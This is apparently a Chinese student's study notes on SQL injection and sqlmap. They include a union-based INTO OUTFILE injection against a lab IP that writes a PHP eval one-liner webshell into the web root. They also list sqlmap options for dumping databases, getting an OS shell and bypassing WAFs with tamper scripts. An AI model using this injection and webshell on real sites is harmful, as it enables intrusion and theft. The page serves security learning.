第十周笔记—SQLmap和sql注入上传木马

目录

SQL注入

上传木马

前提:

  • 要知道网站的绝对路径
  • 具有写入权限
select 'hello world' into outfile 'c:/abcdef.txt'   --路径的斜杠用 /或者\\
--把hello world写入文件中 实战攻击语句:
select * from boy where hid='' union select 11,'hello world'into outfile
'C:/111.txt'; select user()
--查询当前用户名 http://192.168.99.171/test2/sqli/example10.php?catid='3
' union select '<?php @eval($_POST[996])?>',2,3,4
into outfile 'C:/xampp/htdocs/test2/zxh2.php' --+' --后两行为sql注入语句,写入一句话木马

用菜刀连接,网址为木马的路径(不是绝对路径)
一句话木马:<?php @eval($_POST[996])?> --密码为996
用order by(排序)语句试出有多少列

PHP学习网站:
phpstudy

SQLmap

六大模块

  • 输入
  • 输出
  • 发送数据
  • 接受数据
  • 注入点检测
  • 真正攻击模块

命令

sqlmap.py

参数

-r          //读取文件

-u          //读取网址

-v 3        //查看sql注入的命令

-flush     //清除缓存

--is-dba    //是否为dba

--os-shell  //获取系统shell

--dbs       //查看所有数据库,命令用完即删

--threads   //线程数

--current-db    //查看当前网站用的库,命令用完即删

-D "[库名]"    //使用指定库

-T "[表名]"  //使用指定表

--count         //查找有几列,命令用完即删

--colums       //查找列名,显示列名和他的类型

-C "[列名]"    //使用指定列名,可以用逗号隔开

--dump         //把指定列名dump下来,慎用,金融网站犯法

--start 1       //从第一条dump到第二条(不是从0开始取)
--stop 2

三种请求方式

参见图片

取得系统shell

自动上传木马
用x或者q退出,否则会留下木马

原理:传上去一个具有远程命令执行漏洞的页面

条件

  1. 绝对路径
  2. dba超级管理员

命令参数:

--os-shell

--web-root="[绝对路径]"     //需要上传木马的目录

sqlmap高级注入

--identify-waf      //自动测试waf防火墙

--tamper [tamper脚本名称]       //手工指定混码脚本绕过,混码:空白符用%20或者%09代替,
//脚本在sqlmap/tamper文件下,多个脚本用逗号隔开

sql上传木马的更多相关文章

  1. weblogic上传木马路径选择

    对于反序列化漏洞,如果获得的是系统权限或者root权限,那就没必要上传木马,但如果只是web安装应用的权限,就上传获取更大权限. 上传需要找到几个点,获取物理路径,如下面三种: 方法1:把shell写 ...

  2. 绕过图片格式限制上传木马获取WebShell

    思路: 图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php 可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的resp ...

  3. WEB安全:文件上传漏洞

    文件上传漏洞过程 用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力. 一般的情况有: 上传文件WEB脚本语言,服务器的WEB容器解释并执行了用户上传的脚本,导致代码执行: ...

  4. DVWA-全等级文件上传

    DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法 ...

  5. WinsockExpert+NC抓包上传之拿WEBSHELL

    知识补充: nc上传漏洞在原理上同动网上传漏洞一样,都是利用计算机在读取字符串时,遇到'\0'(00)时,认为字符串结束了,从而丢掉后面的字符串,正如unicode编码特性一样,可被人利用,尽管在这里 ...

  6. JAE京东云引擎Git上传管理代码教程和京东云数据库导入导出管理

    文章目录 Git管理准备工作 Git工具上传代码 发布代码装程序 mywebsql管理 京东云引擎小结   JAE京东云引擎是京东推出的支持Java.Ruby.Python.PHP.Node.js多语 ...

  7. Kali学习笔记38:文件上传漏洞

    早些年,提到Web渗透,或者搜索一些黑客教程 基本都会看到文件上传漏洞. 它是一个很经典的漏洞 但它本质其实不是一个漏洞,而是网站本身的上传文件功能 不过如果我们上传了Webshell,那么就成为了文 ...

  8. 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞分析

      0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...

  9. 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞

    0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/ ...

随机推荐

  1. SYN2102型 NTP网络时间服务器

    SYN2102型  NTP网络时间服务器   ntp主时钟服务器ntp时钟服务器厂商使用说明视频链接: http://www.syn029.com/h-pd-57-0_310_1_-1.html 请将 ...

  2. 升级vue全家桶过程记录

    背景 如果你使用了element-ui的el-tabs组件,并且想要单独升级element-ui至2.10.0,你会发现,使用了el-tabs组件的页面只要打开就卡死.原因是element-ui~2. ...

  3. Spring Boot2(二):使用Spring Boot2集成Mybatis缓存机制

    前言 学习SpringBoot集成Mybatis的第二章,了解到Mybatis自带的缓存机制,在部署的时候踩过了一些坑.在此记录和分享一下Mybatis的缓存作用. 本文章的源码再文章末尾 什么是查询 ...

  4. 使用Gson封装和解析JSON

    案例:判断用户名是否存在 在jsp页面使用ajax $("#username").change(function(){ var username = $(this).val(); ...

  5. 妹子问我maven是啥?从相亲说起。。

    自从上一篇原创文章: 第一次教妹子安装IDEA 在<java技术之家>公号发表之后,大家的好评如潮,这给了我继续写下去的信心.感谢你们的支持,我会继续努力的. 自从漂亮妹妹加入我们研发团队 ...

  6. Git的忽略、分支、分支与主线的合并、远程仓库的操作

    如果想了解 Git 以及一些基础命令的使用,请看我的另一篇博客: http://www.cnblogs.com/haojun/p/7797508.html 这篇博客会跟大家介绍一下怎么在提交的时候忽略 ...

  7. Fabric1.4源码解析:Peer节点加入通道

          又开始新的阅读了,这次看的是Peer节点加入通道的过程.其实每次看源码都会有好多没有看懂的地方,不过相信只要坚持下去,保持记录,还是有很多收获的.       对于Peer节点加入通道这一 ...

  8. Codeforces Round #564 (Div. 2)A

    A. Nauuo and Votes 题目链接:http://codeforces.com/contest/1173/problem/A 题目 Nauuo is a girl who loves wr ...

  9. NumPy基础操作

    NumPy基础操作(1) (注:记得在文件开头导入import numpy as np) 目录: 数组的创建 强制类型转换与切片 布尔型索引 结语 数组的创建 相关函数 np.array(), np. ...

  10. jquery 动态 新增 元素 绑定事件

    在jquery1.7以前使用live方法进行绑定,由于年代久远,这里就不介绍了. 在jquery1.7以后我们使用的on方法,这里需要注意的一点就是:如果想让动态生成的元素,都绑上事件,on前面的选择 ...